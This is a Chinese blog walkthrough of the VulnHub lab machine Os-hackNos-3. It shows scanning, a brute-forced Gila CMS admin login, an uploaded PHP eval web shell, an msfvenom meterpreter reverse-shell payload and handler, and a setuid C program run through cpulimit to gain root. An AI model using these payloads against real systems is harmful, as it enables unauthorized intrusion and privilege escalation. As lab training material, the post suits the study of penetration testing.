Hacknos-3

最新推荐文章于 2023-08-04 07:30:00 发布
最新推荐文章于 2023-08-04 07:30:00 发布
阅读量199 收藏
点赞数
文章标签: 安全 web安全

kali ip:192.168.1.193

target ip:192.168.1.202

靶机下载:hackNos: Os-hackNos-3 ~ VulnHub

靶机目标:普通用户的user.txt和root用户的root.txt

步骤一:使用nmap进行网络扫描,发现目标192.168.1.202为入侵目标靶机...

nmap -sn 192.168.1.0/24 
nmap -sS -A -T5 192.168.1.202 -O

步骤二:使用gobuster工具对该网站进行目录扫描发现/scripts/路径并访问...并无实际利用点...

gobuster dir -u http://192.168.1.202/ -w /home/flao/桌面/wordlist.list -x .php,.zip,.txt,.html

步骤三:访问这几个文件无果后回到站点主页面,发现 You need extra WebSec在其站点后面添加路径/websec/发现是一套CMS站点并扫描器后台登录页面/websec/admin

在title处发现Gila CMS字样...并搜索发现为一套开源的CMS...

步骤四:使用搜索引擎检索下Gila CMS的可利用漏洞找到以下两个漏洞....文件包含漏洞需要登录后台,所以接下来的思路就是尝试弱口令爆破....

步骤五:使用cewl工具对其网站信息进行收集并制作成字典...

cewl http://192.168.1.202/websec/ > passwd.txt

步骤六:这里使用网站首页的邮箱作为是用户名,passwd.txt作为密码开始使用Burpsuite对后台进行延迟暴力破解....得出:contact@hacknos.com:SecurityX

步骤七:进入后台后尝试GetShell,在Content>>Media处可以上传图片,Content>>File Manager处可以编辑PHP文件....在Content>>File Manager处进入tmp目录编辑.htaccess文件,将里面的内容全部删除点击Save并进入tmp/media_thumb/目录下上传一句话文件,访问并使用蚁剑进行链接...

<?php @eval($_POST['z4pts']);?>
http://192.168.1.98/websec/tmp/media_thumb/test.php

步骤八:使用蚁剑进行链接并上传由msf生成的Shell文件...在kali中启动msfconsole并进去到监听模式下...并打开浏览器访问shell.php进行shell反弹....

#MSF生成PHP木马
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.193 LPORT=1234 R > shell.php 
chmod 777 shell.php
#kali中启动msfconsole接受Shell反弹
use exploit/multi/handler 
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.1.193
set LPORT 1234

步骤九:在meterpreter下输入shell命令进入目标shell环境并执行以下命令进入bash环境....

python -c 'import pty; pty.spawn("/bin/bash")'

步骤十:编译以下程序源码并上传到靶机目录下,给于777权限并执行获取高权限...并拿去Flag...

#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>

int main()
{
  setuid(0);
  setgid(0);
  system("/bin/bash");
  return 0;
}
#kali中的编译操作
root@kali:~# gcc exp.c -o exp
luci11.c: In function ‘main’:
luci11.c:9:3: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
    9 |   system("/bin/bash");
      |   ^~~~~~
root@kali:~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8080 ...
#目标靶机操作
www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ wget http://192.168.1.193:8080/exp -O exp
<ia_thumb$ wget http://192.168.1.193:8080/exp -O exp   
--2022-02-22 12:48:35--  http://192.168.1.193:8080/exp
Connecting to 192.168.1.193:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16224 (16K) [application/octet-stream]
Saving to: 'exp'

exp                 100%[===================>]  15.84K  --.-KB/s    in 0s      

2022-02-22 12:48:35 (428 MB/s) - 'exp' saved [16224/16224]

www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ ls
ls
assetsgila-logo.png  exp  flao.php  shell.php
www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ whoami
whoami
www-data
www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ chmod 777 exp 
chmod 777 exp
www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ cpulimit -l 100 -f ./exp
<ml/websec/tmp/media_thumb$ cpulimit -l 100 -f ./exp   
Process 3771 detected
root@hacknos:/var/www/html/websec/tmp/media_thumb# whoami
whoami
root
root@hacknos:/var/www/html/websec/tmp/media_thumb# cd /root
cd /root
root@hacknos:/root# ls
ls
root.txt  snap
root@hacknos:/root# cat root.txt

###第二种提权方式:

  1. 切换到home目录下发现存在账户blackdevil用户
  2. 在/var/local/database文件中发现存在加密值
  1. 进行解密的到blackdevil用户密码进行su切换
  2. sudo -l查询sudo权限为ALL 直接sudo su执行得到root用户权限..
www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ cd /home
cd /home
www-data@hacknos:/home$ ls
ls
blackdevil
www-data@hacknos:/home$ cd /var/local
cd /var/local/
www-data@hacknos:/var/local$ ls
ls
database
www-data@hacknos:/var/local$ cat database
cat database
Expenses
Software Licenses,$2.78
Maintenance,$68.87
Mortgage Interest,$70.35
Advertising,$9.78
Phone,$406.80
Insurance,$9.04
Opss;fackespreadsheet
www-data@hacknos:/var/local$ su blackdevil
su blackdevil
Password: Security@x@

blackdevil@hacknos:/var/local$ sudo -l
sudo -l
[sudo] password for blackdevil: Security@x@

Matching Defaults entries for blackdevil on hacknos:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User blackdevil may run the following commands on hacknos:
    (ALL : ALL) ALL
blackdevil@hacknos:/var/local$ sudo su
sudo su
root@hacknos:/var/local# whoami
whoami
root
root@hacknos:/var/local#

###参考资料:

hk653257
关注
VulnHub—Os-hackNos-3
weixin_39219503的博客
01-07 860
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/ 题目信息如下,难度中等,需要获取俩个flag Difficulty: Intermediate Flag: 2 Flag first user And the second root Learning: Web Application | Enume...
靶机Hacknos-3
weixin_50815573的博客
02-23 2644
kali ip:192.168.1.131 target ip:192.168.1.23 靶机下载:hackNos: Os-hackNos-3 ~ VulnHub 靶机目标:普通用户的user.txt和root用户的root.txt 步骤一:使用nmap进行网络扫描,发现目标192.168.1.23为入侵目标靶机... nmap -sn 192.168.1.0/24 nmap -sS -A -T5 192.168.1.202 -O 登录可以发现这样的页面 步骤二:
靶机测试Os-hacknos-3笔记
qq_56426046的博客
01-07 553
Difficulty: IntermediateFlag: 2 Flag first user And the second rootLearning: Web Application | Enumeration | Privilege EscalationWeb-site: www.hacknos.comContact-us : @rahul_gehlautThis works better with VirtualBox rather than VMwarehttps://www.vulnhub.com
Vulnhub靶机:HACKNOS_ OS-HACKNOS-3
LainWith的博客
01-16 1998
目录介绍信息收集主机发现主机信息探测网站探测目录扫描访问子目录爆破登录站点登录网站Getshell方法1:命令执行-失败方法2:msf-失败方法3:冰蝎第一个Flag提权获取flag2查找 suid 文件-cpulimit提权通过dock提权参考 介绍 系列: hackNos 发布日期: 2019年12月14日 难度: 中级 Flag : 一个普通用户的,一个根用户的 学习:漏洞利用、web攻击、枚举、权限提升 靶机地址:https://www.vulnhub.com/entry/hacknos-os-ha
vulnhub靶机 Os-hacknos-3
witwitwiter的博客
08-27 563
vulnhub靶机 Os-hacknos-3 靶机地址hackNos: Os-hackNos-3 ~ VulnHub 目标为 普通用户的user.txt和root用户的root.txt 靶机配置 靶机netplan配置参考我之前的vulnhub靶机 0s-hackNos-2.1_witwitwiter的博客-CSDN博客 渗透测试 使用nmap进行端口扫描 └─# nmap -sV 192.168.5.134 Starting Nmap 7.91 ( https://nmap.org ) at 20
靶机系列测试 Os-hackNos-11
08-03
1.收集信息 3.对Drupal 7.57进行安全检测 5.解密文件 7.特权提升
Os-HackNos-2.1靶机
weixin_46062722的博客
11-18 296
实验环境 攻击机器IP地址:192.168.4.93 目标靶机IP地址:192.168.4.87 网络环境:桥接网络 信息收集 先查看攻击机kali Linux的IP地址 命令:ifconfig 得到自己的IP地址192.168.4.93 我们用Nmap扫描一下存活的主机 命令:nmap -sP 192.168.4.0/24 得到目标靶机IP地址为192.168.4.87 既然我们得到了目标靶机的IP地址,用nmap工具进行端口扫描,发现开放了22和80端口 命令:nmap -A -v 192.16
靶机hackNos Os-Bytesec练习报告1
08-08
id=1yBuih2CsBx45oTUDpFr4JldrzkaOTTeZ https://download.vulnhub.com/hacknos/Os-Byt
靶机 Hacknos:1
m0_51811529的博客
08-30 499
靶机1
oscp——Os-hackNos-3
王嘟嘟的博客
02-02 897
0x00 前言 这个是第十八台机子了,之前做过同系列的Os-hackNos-2.1。 最后,E788B1E88081E5A986E5939F 链接 https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/ 0x01 信息收集 ip 端口 0x02 攻击 端口 端口未果 Web 80端口访问一下,dirb dirb爆破结果 dirb htt...
春秋云镜 CVE-2020-5515
qq_22002773的博客
08-04 348
春秋云镜 CVE-2020-5515
CVE-2020-5515
m0_51674437的博客
07-25 230
简单尝试后,发现账号一定是标准的邮箱格式,进行常见的破包,发现账号为 admin@admin.com / admin 登录成。跑出结果后,查数据库,发现没有ctf数据库,那么就要进行–os-shell,发现也不行,那就只能自己写shell或者直接读取文件就行。请求包: 这里的query=select 1 是为了方便sqlmap拼接,直接跑出结果。尝试了下写shell,发现对输入的数据会过滤,正常的好像也写不进,应该是没有写入的权限。GET请求是没有放回的,点击执行后的POST请求是有返回的。
Gila CMS 文件上传漏洞(CVE-2020-28692)
玄道的网安博客
12-18 1180
简介 Gila CMS是一套基于PHP和MySQL的开源内容管理系统(CMS) 洞概述 攻击者可利用该漏洞可以上传shell到tmp directy,并通过logs函数滥用.htaccess来执行PHP文件。 影响版本 Gila CMS 1.16.0版本存在安全漏洞 环境搭建 到GitHub上下载源码 https://github.com/GilaCMS/gila/archive/1.16.0.zip 访问后台页面成功即为安装完成 漏洞复现 登录用户 漏洞url /ad.
HACKNOS-3靶机渗透详解
大熊
06-13 330
靶机收获 sewl 获取字典 cewl IP地址 > bear.txt 爆破密钥:hydra,的使用。
CMS漏洞复现
qq_43613144的博客
07-20 6339
漏洞复现-啧啧啧
VulnHub渗透实战--hacknos
crispr的博客
02-08 589
Hacknos 0X01 Main Point 1.KaliLinux的字典生成工具-Cewl(爬取页面) 2. 反弹shell连接 3. docker容器提权 4. cpulimit提权 5. hydra http-post-from的爆破 0X02 前期嗅探和端口探测 arp-scan -l #得到靶机IP 172.20.10.3 namp -sV -A -p- 172.20.10.3 ...
Hack the box靶机 Gradnma
菜浪马废的博客
05-28 285
解决进程问题 进程迁移
ATT&CK权限提升-Linux提权总结
u013797594的博客
06-12 1721
ATT&CK权限提升-Linux提权总结
内网渗透-Linux权限维持
lza20001103的博客
09-26 2391
Linux权限维持 文章目录Linux权限维持前言ssh后门Setuid and SetgidLinux隐藏技术后记 前言 前面讲解了window中的权限维持的方法,本期给大家讲解一下Linux中权限维持的方法,内容比较少,大家还是能掌握尽量都掌握吧,在以后的工作渗透中,也是需要用上的。 ssh后门 过滤 ps -elf |grep 12345 监听端口 nc -lvvp 123 查看端口 netstat -anlp|grep 12345 (1)ssh后门(脚本内容)(192.168.231.134) #!
windows压缩包爆破
最新发布
08-13
- *2* [【甄选靶场】Vulnhub百个项目渗透——项目四十八:HACKNOS:OS-BYTESEC(压缩包爆破,无线爆破,环境变量...](https://blog.csdn.net/weixin_65527369/article/details/127443994)[target="_blank" data-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值